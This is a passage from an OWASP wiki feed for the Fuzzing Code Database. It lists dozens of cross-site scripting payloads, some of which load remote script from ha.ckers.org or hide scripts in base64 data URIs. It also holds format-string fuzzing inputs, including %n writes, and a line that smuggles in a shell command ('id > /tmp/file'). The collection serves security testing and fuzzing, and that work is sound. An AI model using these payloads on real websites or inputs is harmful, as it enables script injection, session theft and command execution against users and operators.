&amp;lt;INPUT TYPE=&amp;quot;IMAGE&amp;quot; SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BODY BACKGROUND=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BODY ONLOAD=alert('XSS')&amp;gt;&lt;br /&gt;
&amp;lt;IMG DYNSRC=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG LOWSRC=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BGSOUND SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BR SIZE=&amp;quot;&amp;amp;{alert('XSS')}&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;LAYER SRC=&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;gt;&amp;lt;/LAYER&amp;gt;&lt;br /&gt;
&amp;lt;LINK REL=&amp;quot;stylesheet&amp;quot; HREF=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;LINK REL=&amp;quot;stylesheet&amp;quot; HREF=&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;@import'http://ha.ckers.org/xss.css';&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;Link&amp;quot; Content=&amp;quot;&amp;lt;http://ha.ckers.org/xss.css&amp;gt;; REL=stylesheet&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;BODY{-moz-binding:url(&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;)}&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;XSS STYLE=&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;li {list-style-image: url(&amp;quot;javascript:alert('XSS')&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;UL&amp;gt;&amp;lt;LI&amp;gt;XSS&lt;br /&gt;
&amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;XSS&amp;quot;)'&amp;gt;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IFRAME SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/IFRAME&amp;gt;&lt;br /&gt;
&amp;lt;FRAMESET&amp;gt;&amp;lt;FRAME SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/FRAMESET&amp;gt;&lt;br /&gt;
&amp;lt;TABLE BACKGROUND=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;TABLE&amp;gt;&amp;lt;TD BACKGROUND=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;background-image: url(&amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;XSS&amp;quot;)';&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;IMG STYLE=&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;XSS STYLE=&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
exp/*&amp;lt;A STYLE='no\xss:noxss(&amp;quot;*//*&amp;quot;);xss:&amp;amp;#101;x&amp;amp;#x2F;*XSS*//*/*/pression(alert(&amp;quot;XSS&amp;quot;))'&amp;gt;&lt;br /&gt;
&amp;lt;STYLE TYPE=&amp;quot;text/javascript&amp;quot;&amp;gt;alert('XSS');&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;.XSS{background-image:url(&amp;quot;javascript:alert('XSS')&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;A CLASS=XSS&amp;gt;&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;STYLE type=&amp;quot;text/css&amp;quot;&amp;gt;BODY{background:url(&amp;quot;javascript:alert('XSS')&amp;quot;)}&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;!--[if gte IE 4]&amp;gt;&amp;lt;SCRIPT&amp;gt;alert('XSS');&amp;lt;/SCRIPT&amp;gt;&amp;lt;![endif]--&amp;gt;&lt;br /&gt;
&amp;lt;BASE HREF=&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;OBJECT TYPE=&amp;quot;text/x-scriptlet&amp;quot; DATA=&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;gt;&amp;lt;/OBJECT&amp;gt;&lt;br /&gt;
&amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;gt;&amp;lt;param name=url value=javascript:alert('XSS')&amp;gt;&amp;lt;/OBJECT&amp;gt;&lt;br /&gt;
&amp;lt;EMBED SRC=&amp;quot;http://ha.ckers.org/xss.swf&amp;quot; AllowScriptAccess=&amp;quot;always&amp;quot;&amp;gt;&amp;lt;/EMBED&amp;gt;&lt;br /&gt;
&amp;lt;EMBED SRC=&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot; type=&amp;quot;image/svg+xml&amp;quot; AllowScriptAccess=&amp;quot;always&amp;quot;&amp;gt;&amp;lt;/EMBED&amp;gt;&lt;br /&gt;
&amp;lt;HTML xmlns:xss&amp;gt;&amp;lt;?import namespace=&amp;quot;xss&amp;quot; implementation=&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;gt;&amp;lt;xss:xss&amp;gt;XSS&amp;lt;/xss:xss&amp;gt;&amp;lt;/HTML&amp;gt;&lt;br /&gt;
&amp;lt;XML ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;![CDATA[&amp;lt;IMG SRC=&amp;quot;javas]]&amp;gt;&amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;gt;]]&amp;gt;&amp;lt;/C&amp;gt;&amp;lt;/X&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&lt;br /&gt;
&amp;lt;XML ID=&amp;quot;xss&amp;quot;&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;javas&amp;lt;!-- --&amp;gt;cript:alert('XSS')&amp;quot;&amp;amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/XML&amp;gt;&amp;lt;SPAN DATASRC=&amp;quot;#xss&amp;quot; DATAFLD=&amp;quot;B&amp;quot; DATAFORMATAS=&amp;quot;HTML&amp;quot;&amp;gt;&amp;lt;/SPAN&amp;gt;&lt;br /&gt;
&amp;lt;XML SRC=&amp;quot;xsstest.xml&amp;quot; ID=I&amp;gt;&amp;lt;/XML&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&lt;br /&gt;
&amp;lt;HTML&amp;gt;&amp;lt;BODY&amp;gt;&amp;lt;?xml:namespace prefix=&amp;quot;t&amp;quot; ns=&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;gt;&amp;lt;?import namespace=&amp;quot;t&amp;quot; implementation=&amp;quot;#default#time2&amp;quot;&amp;gt;&amp;lt;t:set attributeName=&amp;quot;innerHTML&amp;quot; to=&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;amp;quot;XSS&amp;amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;gt;&amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;/bin/echo '&amp;lt;SCR'&amp;quot;--&amp;gt;&amp;lt;!--#exec cmd=&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;'&amp;quot;--&amp;gt;&lt;br /&gt;
&amp;lt;? echo('&amp;lt;SCR)';echo('IPT&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;'); ?&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;Set-Cookie&amp;quot; Content=&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;HEAD&amp;gt;&amp;lt;META HTTP-EQUIV=&amp;quot;CONTENT-TYPE&amp;quot; CONTENT=&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;gt; &amp;lt;/HEAD&amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&lt;br /&gt;
&amp;lt;SCRIPT a=&amp;quot;&amp;gt;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT =&amp;quot;&amp;gt;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT a=&amp;quot;&amp;gt;&amp;quot; '' SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT &amp;quot;a='&amp;gt;'&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT a=`&amp;gt;` SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT a=&amp;quot;&amp;gt;'&amp;gt;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;document.write(&amp;quot;&amp;lt;SCRI&amp;quot;);&amp;lt;/SCRIPT&amp;gt;PT SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://66.102.7.147/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://1113982867/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;h\ntt\tp://6&amp;amp;#9;6.000146.0x7.147/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;//www.google.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;//google&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://google.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://www.google.com./&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;javas&amp;amp;#99;ript&amp;amp;#35;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;javas&amp;amp;#99;ript&amp;amp;#35;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;input type=&amp;quot;image&amp;quot; dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;bgsound src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;amp;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&lt;br /&gt;
&amp;lt;img src=&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&amp;gt;&lt;br /&gt;
&amp;lt;link rel=&amp;quot;stylesheet&amp;quot; href=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;iframe src=&amp;quot;vbscript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;mocha:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;livescript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;about:&amp;lt;s&amp;amp;#99;ript&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;meta http-equiv=&amp;quot;refresh&amp;quot; content=&amp;quot;0;url=javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;body onload=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;background-image: url(javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;binding: url([link to code]);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width: expression(document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style type=&amp;quot;text/javascript&amp;quot;&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/style&amp;gt;&lt;br /&gt;
&amp;lt;object classid=&amp;quot;clsid:...&amp;quot; codebase=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style&amp;gt;&amp;lt;!--&amp;lt;/style&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;![CDATA[&amp;lt;!--]]&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;!-- -- --&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;lt;!-- -- --&amp;gt;&lt;br /&gt;
&amp;lt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;quot;onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;gt;&amp;quot; onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml id=&amp;quot;X&amp;quot;&amp;gt;&amp;lt;a&amp;gt;&amp;lt;b&amp;gt;&amp;amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;amp;lt;/script&amp;gt;;&amp;lt;/b&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/xml&amp;gt;&lt;br /&gt;
&amp;lt;div datafld=&amp;quot;b&amp;quot; dataformatas=&amp;quot;html&amp;quot; datasrc=&amp;quot;#X&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;javas&amp;amp;#99;ript&amp;amp;#35;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;input type=&amp;quot;image&amp;quot; dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;bgsound src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;amp;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&lt;br /&gt;
&amp;lt;img src=&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&amp;gt;&lt;br /&gt;
&amp;lt;link rel=&amp;quot;stylesheet&amp;quot; href=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;iframe src=&amp;quot;vbscript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;mocha:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;livescript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;about:&amp;lt;s&amp;amp;#99;ript&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;meta http-equiv=&amp;quot;refresh&amp;quot; content=&amp;quot;0;url=javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;body onload=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;background-image: url(javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;binding: url([link to code]);&amp;quot;&amp;gt; [Mozilla]&lt;br /&gt;
&amp;lt;div style=&amp;quot;width: expression(document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style type=&amp;quot;text/javascript&amp;quot;&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/style&amp;gt;&lt;br /&gt;
&amp;lt;object classid=&amp;quot;clsid:...&amp;quot; codebase=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style&amp;gt;&amp;lt;!--&amp;lt;/style&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;![CDATA[&amp;lt;!--]]&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;!-- -- --&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;lt;!-- -- --&amp;gt;&lt;br /&gt;
&amp;lt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;quot;onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;gt;&amp;quot; onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml id=&amp;quot;X&amp;quot;&amp;gt;&amp;lt;a&amp;gt;&amp;lt;b&amp;gt;&amp;amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;amp;lt;/script&amp;gt;;&amp;lt;/b&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/xml&amp;gt;&lt;br /&gt;
&amp;lt;div datafld=&amp;quot;b&amp;quot; dataformatas=&amp;quot;html&amp;quot; datasrc=&amp;quot;#X&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
[\xC0][\xBC]script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);[\xC0][\xBC]/script&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Format String Statements ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Project Contributor ====&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']]&lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']]&lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']]&lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Fuzzing Code Database Project - GPC Tab}}&lt;br /&gt;
[[Category:OWASP Project|Fuzzing Code Database]]&lt;br /&gt;
[[Category:OWASP Document]]&lt;br /&gt;
[[Category:OWASP Alpha Quality Document]]&lt;br /&gt;
__NOTOC__&lt;br /&gt;
&amp;lt;headertabs/&amp;gt;&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=67374</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=67374"/>
				<updated>2009-08-07T13:57:48Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection software. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated.&lt;br /&gt;
